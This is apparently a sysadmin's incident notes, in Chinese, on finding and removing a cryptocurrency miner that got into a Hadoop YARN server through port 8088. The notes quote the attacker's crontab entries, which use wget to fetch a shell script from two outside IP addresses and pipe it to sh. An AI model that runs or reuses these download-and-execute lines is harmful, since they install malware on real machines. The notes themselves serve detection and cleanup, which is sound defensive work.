阿里云出现挖矿程序
Linux根绝Pid查看进程名
top命令查看占用CPU高的进程
ps -aux | grep PID号
ps -ef | grep PID号
查看yarn程序的信息
ps -ef | grep yarn
yarn 46185 1 99 May03 ? 4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf
yarn挖矿程序
* * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&
ps -ef | grep yarn
yarn 46185 1 99 May03 ? 4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf
tcp 0 1 172.31.**.**:44128 185.222.210.59:80 SYN_SENT 27001/wget
参考网站
https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/
https://zhangnew.com/hadoop-yarn-safe.html
https://blog.csdn.net/BleakRed/article/details/80625551
https://www.linuxidc.com/Linux/2014-09/106497.htm
https://www.jb51.net/hack/186589.html
http://www.freebuf.com/vuls/173638.html
8088,8090
查看哪些IP连接过该端口
netstat -anp |grep 8042
一般是8088端口入侵,可以禁止外网访问8088端口
删除crontab的任务
crontab -l -u yarn
ps -ef | grep yarn
crontab -r -u yarn
删除不相干文件/var/tmp/java